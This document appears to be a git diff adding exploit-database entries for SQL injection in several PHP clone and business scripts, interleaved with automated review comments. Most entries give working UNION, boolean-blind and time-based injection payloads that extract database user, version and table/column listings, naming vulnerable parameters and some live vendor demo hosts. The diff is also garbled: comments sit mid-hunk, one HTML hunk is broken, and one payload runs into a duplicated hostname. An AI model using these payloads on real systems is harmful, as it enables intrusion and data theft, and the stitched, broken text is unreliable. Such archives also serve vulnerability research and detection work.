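Review bot: Item 3 of 43256.txt selects `id`, `username` and `password` from an `admin` table, yet the `# Description:` text still says only that SQL can be injected, so the entry never states the impact. I would add `# Impact: disclosure of the admin table (id, username, password) through search.php` below the description. A line such as `# Response: after fixing the query, treat the admin credentials as exposed and rotate them` would tell operators what to do if the flaw was reachable. Whether the stored passwords are hashed is not visible here, so the wording should not assume either way.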
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: FS Care Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/care-clone/
+# Demo: http://care-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/searchJob.php?jobType=[SQL]&jobFrequency=[SQL]
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43259.txt b/exploits/php/webapps/43259.txt
new file mode 100644
index 000000000..6ce92680e
--- /dev/null
+++ b/exploits/php/webapps/43259.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: FS Amazon Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/amazon-clone/
+# Demo: http://amazon-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/p/VerAyari/[SQL]
+#
+# -9++UNION(SELECT(1),(2),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+-
+#
+# http://server/p/VerAyari/-9++UNION(SELECT(1),(2),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16))--+-
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43260.txt b/exploits/php/webapps/43260.txt
new file mode 100644
index 000000000..bd3939bbb
--- /dev/null
+++ b/exploits/php/webapps/43260.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: FS Trademe Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/trademe-clone/
+# Demo: http://trademe-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/search_item.php?search=[SQL]
+#
+# s'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),7,8,9,10,11,12,13,14--+-
+#
+# http://server/search_item.php?search=s'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),7,8,9,10,11,12,13,14--+-
+#
+# 2)
+# http://localhost/[PATH]/general_item_details.php?id=[SQL]
+#
+# -34++UNION+ALL+SELECT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+#
+# http://server/general_item_details.php?id=-34++UNION+ALL+SELECT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43261.txt b/exploits/php/webapps/43261.txt
new file mode 100644
index 000000000..809572346
--- /dev/null
+++ b/exploits/php/webapps/43261.txt
@@ -0,0 +1,46 @@
+# # # # #
+# Exploit Title: FS Expedia Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/expedia-clone/
+# Demo: http://expedia-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/show-flight-result.php?fl_orig=[SQL]
+# http://localhost/[PATH]/show-flight-result.php?fl_dest=[SQL]
+#
+# 25'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+-
+#
+# http://server/show-flight-result.php?fl_orig=25'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+-
+#
+# http://server/show-flight-result.php?fl_dest=28'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+-
+#
+# 2)
+# http://localhost/[PATH]/pages.php?id=[SQL]
+#
+# -5++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+#
+# http://server/pages.php?id=-5++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+#
+# 3)
+# http://localhost/[PATH]/content.php?id=[SQL]
+#
+# -2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))expedia-clone.demonstration.co.in/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))
+#
+# http://server/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))expedia-clone.demonstration.co.in/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))
+# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43262.html b/exploits/php/webapps/43262.html new file mode 100644 index 000000000..bc14044c3 --- /dev/null +++ b/exploits/php/webapps/43262.html @@ -0,0 +1,30 @@ + + + +
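Review bot: Both lines of item 3 in 43261.txt are malformed: after the closing `(7))` the text runs straight into `expedia-clone.demonstration.co.in/content.php?id=` and then repeats the whole string, which looks like a paste error. Apart from not being a single well-formed request, this puts the vendor's live demo host inside an example that otherwise uses the `http://server/` placeholder. The duplicated tail should be dropped so the record names no third-party host in the request string and reads like items 1 and 2; anyone deriving detection signatures from these entries then works from a clean sample.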
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43263.txt b/exploits/php/webapps/43263.txt new file mode 100644 index 000000000..c7ec15e6b --- /dev/null +++ b/exploits/php/webapps/43263.txt 
@@ -0,0 +1,58 @@
+# # # # #
+# Exploit Title: Advance B2B Script 2.1.3 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/advance-b2b-script/
+# Demo: http://198.38.86.159/~advancedb2b/
+# Version: 2.1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/tradeshow-list-detail.php?show_id=[SQL]
+#
+# -33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
+#
+# http:/server/tradeshow-list-detail.php?show_id=-33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
+#
+# Parameter: show_id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: show_id=33' AND 2728=2728 AND 'YmuO'='YmuO
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 67 columns
+# Payload: show_id=-3015' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706b71,0x584943414f617573724e456a6a5369584f53494448646a56596b4a54736670476c424d6b6a4e556b,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pUZl
+#
+# 2)
+# http://localhost/[PATH]/view-product.php?pid=[SQL]
+#
+# -1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
+#
+# http://server/view-product.php?pid=-1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
+#
+# Parameter: pid (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: pid=1555' AND 2914=2914 AND 'zyef'='zyef
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: pid=1555' AND SLEEP(5) AND 'DubS'='DubS
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 33 columns
+# Payload: pid=1555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x4776706c6c514f494a596a436179624947684a6c655163434156506b6d454463737076706d52506d,0x71766b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHVm
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43264.txt b/exploits/php/webapps/43264.txt
new file mode 100644
index 000000000..85979d177
--- /dev/null
+++ b/exploits/php/webapps/43264.txt
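Review bot: The second example URL under item 1 of 43263.txt is written `http:/server/tradeshow-list-detail.php?show_id=...` with a single slash after the scheme, while item 2 and the other entries in this batch use `http://server/`. The prefix should read `http://server/` so the entry is consistent and tooling that extracts URLs from the database for rule testing does not skip the line.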
@@ -0,0 +1,54 @@
+# # # # #
+# Exploit Title: Advance Online Learning Management Script 3.1 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/online-learning-management-script/
+# Demo: http://thavasu.com/demo/online_education/
+# Version: 3.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/courselist.php?subcatid=[SQL]
+#
+# -9'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
+#
+# http://server/courselist.php?subcatid=-9'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
+#
+# Parameter: subcatid (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: subcatid=9' AND 7659=7659 AND 'Akrr'='Akrr
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: subcatid=9' AND SLEEP(5) AND 'DoFl'='DoFl
+#
+# 2)
+# http://localhost/[PATH]/courselist.php?popcourseid=[SQL]
+#
+# 1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
+#
+# http://server/courselist.php?popcourseid=1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
+#
+# Parameter: popcourseid (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: popcourseid=1' AND 9182=9182 AND 'vWmu'='vWmu
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: popcourseid=1' AND SLEEP(5) AND 'THTz'='THTz
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43265.txt b/exploits/php/webapps/43265.txt
new file mode 100644
index 000000000..3aea1c613
--- /dev/null
+++ b/exploits/php/webapps/43265.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Affiliate MLM Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/affiliate-mlm-script/
+# Demo: http://www.smsemailmarketing.in/demo/Affiliate/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/product-category.php?key=[SQL]
+#
+# Parameter: key (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: key=a%' AND 5436=5436 AND '%'='
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43266.txt b/exploits/php/webapps/43266.txt
new file mode 100644
index 000000000..26516c3db
--- /dev/null
+++ b/exploits/php/webapps/43266.txt
@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: Basic B2B Script 2.0.8 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/professional-b2b-script/
+# Version: 2.0.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/product_details.php?id=[SQL]
+#
+# -348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+--
+#
+# http://server/product_details.php?id=-348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+--
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43267.txt b/exploits/php/webapps/43267.txt
new file mode 100644
index 000000000..e20d98c35
--- /dev/null
+++ b/exploits/php/webapps/43267.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: Beauty Parlour Booking Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/beauty-booking-script/
+# Demo: http://fxwebsolution.com/demo/beautyparlour-search/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/list?gender=[SQL]&main_search=
+#
+# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+#
+# http://server/beautyparlour-search/list?gender='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
+#
+# 2)
+# http://localhost/[PATH]/list?city=[SQL]&main_search=
+#
+# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+#
+# http://server/beautyparlour-search/list?city='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
+#
+# # # # #
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 503f819c1..8c62511ec 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv 
@@ -38280,3 +38280,23 @@ id,file,description,date,author,type,platform,port
 43243,exploits/php/webapps/43243.txt,"FS Quibids Clone 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
 43244,exploits/php/webapps/43244.txt,"FS Olx Clone 1.0 - 'scat' / 'pid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
 43245,exploits/php/webapps/43245.txt,"FS Monster Clone 1.0 - 'Employer_Details.php?id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43246,exploits/php/webapps/43246.txt,"FS Makemytrip Clone 1.0 - 'fl_orig' / 'fl_dest' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43249,exploits/php/webapps/43249.txt,"FS Linkedin Clone 1.0 - 'grid' / 'fid' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43250,exploits/php/webapps/43250.txt,"FS Indiamart Clone 1.0 - 'token' / 'id' / 'c' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43251,exploits/php/webapps/43251.txt,"FS IMDB Clone 1.0 - 'f' / 's' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43252,exploits/php/webapps/43252.html,"FS Grubhub Clone 1.0 - 'keywords' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43253,exploits/php/webapps/43253.txt,"FS Groupon Clone 1.0 - 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43254,exploits/php/webapps/43254.txt,"FS Gigs Script 1.0 - 'cat' / 'sc' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43255,exploits/php/webapps/43255.txt,"FS Freelancer Clone 1.0 - 'profile.php?u' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43256,exploits/php/webapps/43256.txt,"FS Ebay Clone 1.0 - 'id' / 'sub_category_id' / 'category_id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43257,exploits/php/webapps/43257.txt,"FS Crowdfunding Script 1.0 - 'latest_news_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43258,exploits/php/webapps/43258.txt,"FS Care Clone 1.0 - 'jobFrequency' / 'jobType' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43259,exploits/php/webapps/43259.txt,"FS Amazon Clone 1.0 - SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43260,exploits/php/webapps/43260.txt,"FS Trademe Clone 1.0 - 'search' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43261,exploits/php/webapps/43261.txt,"FS Expedia Clone 1.0 - 'fl_orig' / 'fl_dest' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43262,exploits/php/webapps/43262.html,"FS Foodpanda Clone 1.0 - SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43263,exploits/php/webapps/43263.txt,"Advance B2B Script 2.1.3 - 'show_id' / 'pid' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43264,exploits/php/webapps/43264.txt,"Advance Online Learning Management Script 3.1 - 'subcatid' / 'popcourseid' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43266,exploits/php/webapps/43266.txt,"Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80